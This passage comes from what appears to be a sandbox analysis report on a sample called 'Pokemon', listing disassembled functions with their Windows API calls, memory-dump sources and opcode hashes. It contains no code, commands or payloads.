                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0875e359fbe3c7128a88a9a2c64d2cfb7df198c3cbf09c11afe4070988018907
                                                                                                                                                                                                                                                                                      • Instruction ID: 4b0f6ecb21ee8f5d1eed92d88aceac219644bf871ff6d7c4828b177a17d3ccf2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0875e359fbe3c7128a88a9a2c64d2cfb7df198c3cbf09c11afe4070988018907
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A412775600218FFDB219F69EC88EAA7BBCFF89711F104058F905D7660D730A9A2DB60
                                                                                                                                                                                                                                                                                      Function 0011C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C154
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011C1D2
                                                                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0011C26A
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011C2DE
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011C2FC
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0011C352
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0011C364
                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0011C382
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0011C3E3
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011C3F4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                      • Opcode ID: 61fdd86950127ce53d9536f6cb21a666cf80792aa3b4a9b162288dd8f6d4d778
                                                                                                                                                                                                                                                                                      • Instruction ID: edac03125030374cd6ccf950aaf19cc29d476a2be1bcf0fcc59fc8014b9a6338
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61fdd86950127ce53d9536f6cb21a666cf80792aa3b4a9b162288dd8f6d4d778
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36C16E35244241EFD718DF14C495FAABBE1BF84314F1484ACF46A8B6A2CB71ED86CB91
                                                                                                                                                                                                                                                                                      Function 00112FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00113035
                                                                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00113045
                                                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00113051
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0011305E
                                                                                                                                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001130CA
                                                                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00113109
                                                                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0011312D
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00113135
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0011313E
                                                                                                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00113145
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00113150
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                      • Opcode ID: fbbbdeaafb3a1083310cf49a0ef14ac889ea649c57e7f20c1661bea5c9bcd74c
                                                                                                                                                                                                                                                                                      • Instruction ID: f00cfd6368665b950744cdd12646d0f98c2bcd8bbef9462716e560d87d8a4a53
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbbbdeaafb3a1083310cf49a0ef14ac889ea649c57e7f20c1661bea5c9bcd74c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA61E2B5D00219AFCB18CFA8D884EEEBBF5FF48310F208529E559A7650D771A991CF90
                                                                                                                                                                                                                                                                                      Function 0012A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0012A990
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 0012A9A7
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0012A9B3
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0012A9C9
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0012AC15
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0012AC33
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0012AC54
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0012AC73
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0012AC95
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?), ref: 0012ACBB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: bc902fb36898c840da67b961ab2c22113718ccfdb74d826aecc448c908d07bab
                                                                                                                                                                                                                                                                                      • Instruction ID: 7ed35896a70e8ae89cbc5953513c72ef5d7ffab8ef0a4c5cee85decb77b865fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc902fb36898c840da67b961ab2c22113718ccfdb74d826aecc448c908d07bab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35B1AC31600229EFDF18CF68D9847AE7BF2FF44704F588069ED44AB295D770A9A0CB61
                                                                                                                                                                                                                                                                                      Function 000F52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 000F52E6
                                                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000F5328
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F5339
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 000F5345
                                                                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 000F537A
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 000F53B2
                                                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000F53EB
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 000F5445
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 000F5477
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000F54EF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                      • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                      • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                      • Opcode ID: 35f980754c152e538377b42d01df5a976413e5a0e24526932eebedd204acb93b
                                                                                                                                                                                                                                                                                      • Instruction ID: 638d16b831e771912728cdaa6d6c17d34e381d48c38cc48b742cf3c7f6854aa7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35f980754c152e538377b42d01df5a976413e5a0e24526932eebedd204acb93b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B91D171104A0AABDB54CF24DD94BBAB7E9FF40306F004519FB8682891EB31ED56DB81
                                                                                                                                                                                                                                                                                      Function 0012976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001297B6
                                                                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 001297C6
                                                                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 001297D1
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00129879
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0012992B
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00129948
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00129958
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0012998A
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001299CC
                                                                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001299FD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 1086fc653536e9984eec5274c20a6ac15ef836f763b41b013a4e6b3c8493bcdd
                                                                                                                                                                                                                                                                                      • Instruction ID: 0c3783d6ddd1cb6420ba10b19218aa67f807150f42cb8e87a055c5b7e04fb4f5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1086fc653536e9984eec5274c20a6ac15ef836f763b41b013a4e6b3c8493bcdd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17810971504325AFDB14CF28EC84AAB7BE8FF89314F04092DF98597291D770D965CBA1
                                                                                                                                                                                                                                                                                      Function 000FC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(001629C0,000000FF,00000000,00000030), ref: 000FC973
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(001629C0,00000004,00000000,00000030), ref: 000FC9A8
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 000FC9BA
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 000FCA00
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 000FCA1D
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 000FCA49
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000FCA90
                                                                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000FCAD6
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FCAEB
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FCB0C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 92792db4399e94f2d6e037957b9e93922efbfbb637b5b1ebbd519bdf392a8f8c
                                                                                                                                                                                                                                                                                      • Instruction ID: 537d9dd9c8ffba768da8d6e0e48bde178f76cd1ff83a613e46a60d9bfb40c18c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92792db4399e94f2d6e037957b9e93922efbfbb637b5b1ebbd519bdf392a8f8c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9361AE7090024DAFEF21CF64DA8AEFE7BB8FB05348F040015EA11A3A51D771AD51EB61
                                                                                                                                                                                                                                                                                      Function 000FE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 000FE4D4
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000FE4FA
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE504
                                                                                                                                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 000FE554
                                                                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000FE570
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                      • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                      • Opcode ID: 509c166a44da2fb1119e187e47a9983b7b7a09ed121c2e7cf4fdb373c7e5e5aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 927fe3f0c60126e817117dd6451168779e48893435492c930502110147c27c10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 509c166a44da2fb1119e187e47a9983b7b7a09ed121c2e7cf4fdb373c7e5e5aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A341F5729002187AEB14AB64EC47EFF77ACDF55B20F104469FA00E6093FF749B11A2A5
                                                                                                                                                                                                                                                                                      Function 0011D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0011D6C4
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0011D6ED
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0011D7A8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0011D70A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0011D71D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0011D72F
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0011D765
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0011D788
                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0011D753
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                      • Opcode ID: f27ac2585b840aa48a07cd2ea3fb39a5c224d2c5976b52c3cb5380a7d399900c
                                                                                                                                                                                                                                                                                      • Instruction ID: e03b8cb873cf4e4988c91cd83b614de0a32aaefab4a534146139ccd8897d8fdf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f27ac2585b840aa48a07cd2ea3fb39a5c224d2c5976b52c3cb5380a7d399900c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D316F72901129BBDB259BA0EC88EFFBB7CEF55714F000565F805E2150DB749E86DAA0
                                                                                                                                                                                                                                                                                      Function 000FEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 000FEFCB
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AF215: timeGetTime.WINMM(?,?,000FEFEB), ref: 000AF219
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 000FEFF8
                                                                                                                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 000FF01C
                                                                                                                                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 000FF03E
                                                                                                                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 000FF05D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000FF06B
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 000FF08A
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 000FF095
                                                                                                                                                                                                                                                                                      • IsWindow.USER32 ref: 000FF0A1
                                                                                                                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 000FF0B2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
